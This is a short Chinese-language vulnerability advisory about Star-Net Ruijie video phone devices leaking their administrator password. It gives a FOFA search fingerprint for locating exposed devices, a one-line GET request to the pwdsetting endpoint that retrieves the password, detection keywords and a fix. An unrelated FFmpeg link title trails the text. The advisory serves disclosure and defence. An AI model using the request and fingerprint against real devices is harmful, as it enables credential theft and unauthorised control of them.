星网锐捷 视频话机设备pwdsetting管理密码信息泄漏
漏洞描述
星网锐捷视频话机设备 泄露管理员密码,攻击者可利用密码直接进入后台配置页面,执行恶意操作,进行一步攻击。
威胁等级: 高危
漏洞分类: 信息泄露
涉及厂商及产品:星网锐捷:星网锐捷视频话机设备 (硬件)
应用指纹及检出思路
匹配源代码 /console/index.html?time= 即可
fofa:body="/console/index.html?time="
漏洞复现
GET /console/secure/pwdsetting HTTP/1.1
Host:
检测思路
检测json数据关键字段即可。如cOldPasswd webport adminPasswd
修复建议
设置访问控制策略,禁用此接口
——FFmpeg源码中解码WAV Header的实现 "音视频入门基础:WAV专题(5)——FFmpeg源码中解码WAV Header的实现")